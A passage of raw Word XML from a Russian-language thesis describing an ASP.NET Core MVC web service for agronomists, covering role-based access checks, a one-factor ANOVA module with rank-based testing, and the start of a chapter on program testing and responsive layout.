      <w:r w:rsidRPr="000D7299">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>данных</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000D7299">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>&lt;/</w:t>
      </w:r>
      <w:r w:rsidRPr="000D7299">
        <w:rPr>
          <w:color w:val="800000"/>
        </w:rPr>
        <w:t>button</w:t>
      </w:r>
      <w:r w:rsidRPr="000D7299">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C0089C" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00AE25A7" w:rsidRDefault="0093378B" w:rsidP="000D7299">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE25A7">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1016EE84" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="000D7299">
      <w:r>
        <w:t>Если условие верно (то есть пользователь аутентифицирован), то выполняется код в фигурных скобках (появляется новая кнопка). В противном случае, когда вход в приложение не выполнен, данной кнопки не будет на сайте.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC8E703" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="000D7299">
      <w:r>
        <w:t xml:space="preserve">Также можно разграничить права пользователя с помощью кода </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68534C9B" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00AE25A7" w:rsidRDefault="0093378B" w:rsidP="000D7299">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE25A7">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>@</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE25A7">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:t>User</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE25A7">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>IsInRole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AE25A7">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE25A7">
        <w:rPr>
          <w:color w:val="A31515"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t>Admin</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE25A7">
        <w:rPr>
          <w:color w:val="A31515"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE25A7">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EAED370" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00AE25A7" w:rsidRDefault="0093378B" w:rsidP="000D7299">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE25A7">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F25690" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00AE25A7" w:rsidRDefault="0093378B" w:rsidP="000D7299">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE25A7">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE25A7">
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="800000"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE25A7">
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE25A7">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Вы авторизованы как администратор</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE25A7">
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="800000"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE25A7">
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32EFBB37" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00AE25A7" w:rsidRDefault="0093378B" w:rsidP="000D7299">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE25A7">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63865E50" w14:textId="24ED78DE" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00E662A4">
      <w:r>
        <w:t>Где в условии проверяется принадлежность пользователя к определённой группе.</w:t>
      </w:r>
      <w:r w:rsidR="00E662A4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Процедура аутентификации и авторизации проведена успешно</w:t>
      </w:r>
      <w:r w:rsidR="00E258B2" w:rsidRPr="00E258B2">
        <w:t xml:space="preserve"> [20]</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5365EB7C" w14:textId="036B854E" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00A069BF">
      <w:r>
        <w:t>Также в веб сервисе доступна вкладка «Анализ», где можно провести однофакторный дисперсионный анализ</w:t>
      </w:r>
      <w:r w:rsidR="00E662A4">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t>Математическая модель работы однофакторного дисперсионного анализа описана в параграфе 1.3. Данные необходимо ввести в текстовое поле, одна строка соответствует одной градации фактора, где наблюдения разделены запятыми.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1BDEE7" w14:textId="597ED942" w:rsidR="0093378B" w:rsidRDefault="002E57B7" w:rsidP="009C53F7">
      <w:r w:rsidRPr="002E57B7">
        <w:t xml:space="preserve">Также на данной странице присутствует возможность ознакомиться с результатами проведения непараметрического теста Фишера, присвоив введённым пользователем данным ранги и проведя с ранговыми данными </w:t>
      </w:r>
      <w:r w:rsidRPr="002E57B7">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">дисперсионный анализ. Описание алгоритма ранжирования представлено в параграфе 1.3. </w:t>
      </w:r>
      <w:r w:rsidR="0093378B" w:rsidRPr="002E57B7">
        <w:t xml:space="preserve">После того как данным присвоены ранги можно провести дисперсионный анализ на этих данных и получить новые значения: </w:t>
      </w:r>
      <w:r w:rsidR="0093378B" w:rsidRPr="002E57B7">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="0093378B" w:rsidRPr="002E57B7">
        <w:instrText xml:space="preserve"> QUOTE </w:instrText>
      </w:r>
      <w:r w:rsidR="00BA1029" w:rsidRPr="002E57B7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4EB120F6" wp14:editId="1640D1DB">
            <wp:extent cx="133350" cy="14287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93378B" w:rsidRPr="002E57B7">
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="0093378B" w:rsidRPr="002E57B7">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00BA1029" w:rsidRPr="002E57B7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C4A6B95" wp14:editId="383F0177">
            <wp:extent cx="133350" cy="14287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93378B" w:rsidRPr="002E57B7">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="0093378B" w:rsidRPr="002E57B7">
        <w:t xml:space="preserve"> – фактическое значение Фишера для ранговых данных и </w:t>
      </w:r>
      <w:r w:rsidR="0093378B" w:rsidRPr="002E57B7">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="0093378B" w:rsidRPr="002E57B7">
        <w:instrText xml:space="preserve"> QUOTE </w:instrText>
      </w:r>
      <w:r w:rsidR="00BA1029" w:rsidRPr="002E57B7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E0E3AC0" wp14:editId="30EACD95">
            <wp:extent cx="142875" cy="142875"/>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3378B" w:rsidRPr="002E57B7">
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="0093378B" w:rsidRPr="002E57B7">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00BA1029" w:rsidRPr="002E57B7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12F0A8E7" wp14:editId="423D6216">
            <wp:extent cx="142875" cy="14287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3378B" w:rsidRPr="002E57B7">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="0093378B" w:rsidRPr="002E57B7">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="0093378B" w:rsidRPr="002E57B7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidR="0093378B" w:rsidRPr="002E57B7">
        <w:t>-уровень значимости для ранговых данных.</w:t>
      </w:r>
      <w:r w:rsidR="0093378B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71431A02" w14:textId="0DDD28CE" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="009C53F7">
      <w:r>
        <w:t xml:space="preserve">В модуле дисперсионного анализа определён файл </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>Anova.cs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00870A0C">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">где определён класс </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>OneFactorData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, представляющий собой массив значений типа </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>double</w:t>
      </w:r>
      <w:r w:rsidRPr="00870A0C">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">по которому можно итерироваться, по сути, это класс для определения одной группы фактора. Структура </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>FTableKey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00870A0C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">является служебной и необходима для вычисления критического значения Фишера. Класс </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>Anova</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00870A0C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">является ключевым. В нём в качестве полей определены все поля, соответствующие модели дисперсионного анализа для работы формул, описанных в параграфе 1.3. Весь алгоритм работы находится в конструкторе класса, где описанные выше формулы рассчитываются. Данный класс принимает в качестве входного параметра массив </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>OneFactorData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, что по сути является набором групп фактора. Содержимое конструктора приведено в </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">Приложении </w:t>
      </w:r>
      <w:r w:rsidR="00CC2EBA">
        <w:t>Г</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3649B39E" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="009C53F7">
      <w:r>
        <w:t>В файле</w:t>
      </w:r>
      <w:r w:rsidRPr="00E73321">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>AnalysisController.cs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> в методе </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>PartialViewResult</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve"> _</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>SpawnAnalyze</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>inputData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00E73321">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>создаются</w:t>
      </w:r>
      <w:r w:rsidRPr="00E73321">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">экземпляры класса </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>Anova</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E73321">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">после того как пользователь ввёл данные и нажал кнопку «Анализ». Содержимое текстового поля приходит с помощью </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GET</w:t>
      </w:r>
      <w:r w:rsidRPr="00E73321">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>запроса, затем асинхронно создаётся частичное представление в виде таблицы результатов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447C75A9" w14:textId="17D29E98" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="009C53F7">
      <w:r>
        <w:t xml:space="preserve">Самым интересным методом данного файла является </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>OneFactorData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>RangeData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>OneFactorData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>[] d)</w:t>
      </w:r>
      <w:r w:rsidRPr="00E73321">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Данный метод принимает в качестве входного параметра данные, введённые пользователем, а возвращает ранговые данные. Алгоритм работы метода </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>RangeData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">приведен на схеме </w:t>
      </w:r>
      <w:r w:rsidR="00002242">
        <w:t>28</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75BAB63F" w14:textId="5DA57541" w:rsidR="0093378B" w:rsidRPr="002B2CF3" w:rsidRDefault="00BA1029" w:rsidP="002B2CF3">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0066369B">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="358C4E88" wp14:editId="34E55974">
            <wp:extent cx="2752725" cy="8315325"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="7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52725" cy="8315325"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="16EE97A2" w14:textId="6E6F5BB1" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00D16020">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidR="008F392E">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00E662A4">
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> –Схема работы алгоритма ранжирования данных.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3BE85C" w14:textId="65B83E76" w:rsidR="008F392E" w:rsidRDefault="0093378B" w:rsidP="00D16020">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>С помощью вышеописанного функционала агроном сможет выявить, какое именно влияние агроэкосистемы оказывает значимый эффект на исследуемый опытный образец.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68411719" w14:textId="77777777" w:rsidR="008F392E" w:rsidRDefault="008F392E">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D7200F" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="002A0DC9">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="_Toc161568216"/>
      <w:bookmarkStart w:id="42" w:name="_Toc162709242"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>5 Поддержка программы</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/>
      <w:bookmarkEnd w:id="42"/>
    </w:p>
    <w:p w14:paraId="61F599BE" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="004D79A4">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="43" w:name="_Toc161568217"/>
      <w:bookmarkStart w:id="44" w:name="_Toc162709243"/>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF5577">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs/>
        </w:rPr>
        <w:t>Тестирование программы</w:t>
      </w:r>
      <w:bookmarkEnd w:id="43"/>
      <w:bookmarkEnd w:id="44"/>
    </w:p>
    <w:p w14:paraId="2617F401" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00EB413D">
      <w:r>
        <w:t>В настоящем параграфе будут описаны использованные техники тестирования веб-сервиса. Поскольку в текущем проекте значительную роль играет графический пользовательский интерфейс, необходимо протестировать эргономичность информационной системы, как система работает на различных устройствах и как ведёт себя в исключительных случаях.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF88601" w14:textId="7628A7EF" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00EB413D">
      <w:r>
        <w:t xml:space="preserve">Также при тестировании проекта применялись модульные тесты. Они используются для проверки поведения отдельных компонентов и функциональных средств в приложении, а платформа </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ASP</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB413D">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NET</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB413D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Core</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB413D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MVC</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB413D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>спроектирован</w:t>
      </w:r>
      <w:r w:rsidR="0042608C">
        <w:t>а</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> так, чтобы максимально облегчить настройку и запуск модульных тестов для веб-приложений.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C39C4AD" w14:textId="1970F379" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00EB413D">
      <w:r>
        <w:t>При разработке веб</w:t>
      </w:r>
      <w:r w:rsidR="0042608C">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">сервиса была использована технология адаптивной вёрстки. Адаптивная вёрстка – это создание страниц сайта, которые автоматически подстраиваются под разрешение экрана устройства. Веб-интерфейс разрабатывался для трёх разрешений: компьютерной (ширина страницы </w:t>
      </w:r>
      <w:r w:rsidRPr="004B746E">
        <w:t xml:space="preserve">1200 </w:t>
      </w:r>
      <w:r>
        <w:t>пикселей), планшетной (ширина страницы 768 пикселей) и мобильной (ширина страницы 320 пикселей). Благодаря такому подходу, пользователь сможет зайти на портал с любого устройства, на котором установлен веб-браузер и присутствует доступ в интернет.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70118BE6" w14:textId="360E96C7" w:rsidR="00E662A4" w:rsidRDefault="0093378B" w:rsidP="00EB413D">
      <w:r>
        <w:t>Ориентация и положение элементов графического пользовательского интерфейса на компьютерной и планшетной версии практически не различаются</w:t>
      </w:r>
      <w:r w:rsidR="00E662A4">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326EB96A" w14:textId="77777777" w:rsidR="00E662A4" w:rsidRDefault="00E662A4" w:rsidP="00E662A4">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00BF681E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1592450B" wp14:editId="276F7650">
            <wp:extent cx="4455042" cy="4204074"/>
            <wp:effectExtent l="0" t="0" r="3175" b="635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462420" cy="4211036"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CCBE80E" w14:textId="2761E329" w:rsidR="00E662A4" w:rsidRDefault="00E662A4" w:rsidP="00E662A4">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Рисунок 2</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – отображение данных из БД на сайте в табличном виде</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BB21AA" w14:textId="72EACCD7" w:rsidR="00E662A4" w:rsidRDefault="00E662A4" w:rsidP="00EB413D"/>
    <w:p w14:paraId="7802CA10" w14:textId="77777777" w:rsidR="00E662A4" w:rsidRDefault="00E662A4" w:rsidP="00E662A4">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00D25175">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:drawing>
